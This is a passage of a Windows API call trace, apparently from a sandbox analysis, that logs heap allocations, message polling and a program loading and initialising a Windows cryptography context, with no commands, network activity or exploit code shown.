| out: hHeap=0x970000) returned 1 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.655] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.656] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0255.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0255.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0255.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0255.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.657] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.657] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0255.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.658] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0255.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0255.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0255.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0255.658] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0255.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0255.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b68 [0255.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0255.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0255.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0255.660] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0255.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0255.660] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0255.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0255.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.664] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0255.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0255.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0255.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0255.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0255.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0255.665] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0255.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0255.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0255.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0255.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 